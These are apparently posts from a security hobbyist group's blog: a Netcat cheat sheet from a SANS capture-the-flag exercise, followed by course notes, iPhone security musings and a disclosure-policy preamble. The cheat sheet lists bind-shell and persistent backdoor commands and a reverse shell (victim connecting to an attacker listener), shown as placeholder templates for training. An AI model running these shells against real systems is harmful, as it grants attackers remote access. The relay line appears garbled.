All the networking you could need: Netcat

So my SANS course this past week culminated today with a nice game of capture the flag. While not Defcon caliber it ended up being quite a lot of fun, especially for a game that only could last six hours, and did a fantastic job of bringing the course together. We learned a lot of tools during the class and playing scenario based ctf brought it all together as many of them were used during the game. Mostly we focused the old favorites: NMap, Nessus, John the Ripper; the kinda tools that have been around forever, and for good reason.

We focused mainly on another tool, one I'd known but used little. Called the "network swiss-army knife" Netcat proved, as we were promised by Ed, the most useful tool of the whole course. Netcat does just about everything. Yes, I know, if you've been in networking or security for any amount of time you're asking how I'd missed that, I hadn't, but practical use is something else. There's no doubt it's one of the most useful tools a network admin, security engineer, or hacker could ever want. So just for general consumption, and for myself, I'm posting the cheat sheet I used during our class CTF competition (my team came in 3rd of around 50 in case you were wondering) just to get any other Netcat neophytes started and possible remind some old hands of some fun tricks:

Data Transfer (Pull):
server: nc -l -p [port] < [filename]
client: nc [server ip] [server port] > [filename]

Data Transfer (Push):
server: nc -l -p [port] > [filename]
client: nc [server ip] [server port] < [filename]

Backdoors:
unix: nc -l -p [port] -e /bin/sh
windows: nc -l -p [port] -e cmd.exe

Persistant Backdoor:
while [ 1 ]; nc -l -p [port] -e /bin/sh; done

Reverse Shell
server (attacker): nc -l -p [port]
client (victim): nc [server ip] [server port] -e [shell]

Backdoor Client:
nc [server ip] [port]

Traffic Relay on Linux:
mknod backpipe p
nc -l -p [incoming port] 0backpipe

Traffic Replay:
nc [targetip] [port] < [filename]

A special thanks to David "The Canadian Invasion" and Josh (it's a d, not an 8); great team fellas, it was a pleasure.

At least we're learning

I've spent the past few days taking the SANS 504 course: Hacking Techniques, Exploits, and Incident Handling. I was lucky enough to have the course creator, Ed Skoudis, as my course instructor. I don't know if I know anyone who seems to have Ed's combination of breadth and depth in the information security field. I guess that's how you become one of the senior handlers at the SANS Internet Storm Center.

I plan on doing a write up of my class and what the Vulnerable Minds have been up to for the past few weeks. A short update:

• I've been in training, busy at work, and abusing Yahoo Pipes, something I'll write more about later.
  
• Bacchus has stopped reading anything but Snort alerts, which made Bacon a bit anxious so I think he's trying to make up some new encrypted communication channel. I may help with that a bit.
  
• ev3 has been reversing everything she gets her hands on including, I'm pretty sure, her reversing tools.
  
• No one's really sure what Narc, GPmidi, Norris, or LogicX have been doing, but thats prolly a good thing.
  
• Saijak seems to have forgotten how to use a computer, though with good reason.

Regardless we're all all getting stoaked for Defcon and various Minds will be making it out there Thursday and Friday. We'll be in the Riveria and around various places. More about our plans to come.

By the way check out Ed's incident handler challenges, fun stuff.

Another iPhone Security Perspective

Alright, I promise, last iPhone post, at least from me.

The fine folks over at Symantec's Security Response group are apparently taking a look at the iPhone from a "Wouldn't it be fun to land malicious code on this" perspective and seem to have more confidence than I did initially (See: iPhone sounds atlot like iPwn), and with good reason. It would seem that Apple hasn't been as caviler with their AJAX/iPhone integration as early reports suggested. For now that seems like good reason, but as the iPhone gets opened up further and further, either by Apple or by intrepid hackers, that may change.

So give the Symantec article a read, and enjoy your iPhone. We'll be coming for it soon...

iPh0n3: And so it begins...

From TUAW:

"iPhone enthusiasts over at the #iphone-talk and #iphone-mac channels on irc.osx86.hu have developed iPhoneInterface, a new Windows and Mac tool that allows you to manipulate the iPhone's state, launch services, and interact with the iPhone filesystem. With it, you'll be able to scan the iPhone file structure, create and remove folders, start iPhone services, and more."

I don't think anyone is really surprised that this happened I know many people who believe that Apple actually encourages this type of behavior, evidenced by the easy of cracking into the AppleTV and the numerous enhancements that followed. I don't know if I quite fall into that camp, but I do think it's inevitable that any closed system that gains interest from so many technically inclined people will not stay closed for long. I don't know if that's really a statement about security, or just common sense.

Protection/hackiblity philosophy aside I'm excited to see where this goes as I get ready to throw down my own $600 to Apple/AT&T. Take the already impressive iPhone, throw in a healthy helping of the great features you get in regular OS X, and add in some of the features found in other high end phones, and you really have a be all device. Truth be told I'd actually be reluctant to use such hacks on my main phone, but my real hope is that this kind of thing encourages Apple to open up the iPhone, add the features people have been asking for, and make it a lil hacking pad that I can also get email and make calls on.

That being said I think SSH and the ability to browse the filesystem are a must, but how about a Python interpreter or something? Flash maybe? A Safari view source option? TextMate for iPhone? Are you listening Apple? I want to be able to play next year's CTF qualifier on the Metro.

Closure to Disclosure

There's been a fair bit of discussion lately about disclosure policies of various groups and people in information security. This isn't new, or really a surprise, disclosure is something that comes up every few months, every conference, and other random times based on the alignment of Jupiter and Tim's hairstyle. I plan on throwing my opinion on various topics out there, but first I felt it would be most appropriate to make Vulnerable Minds disclosure policy a matter of record. I admit we borrowed heavily from the fine folks at Matasano Chargren, but after our own discussion, modification, and consideration we feel that this document represents the best way of handling vulnerabilities; for us, for vendors, and for the computing community as a whole.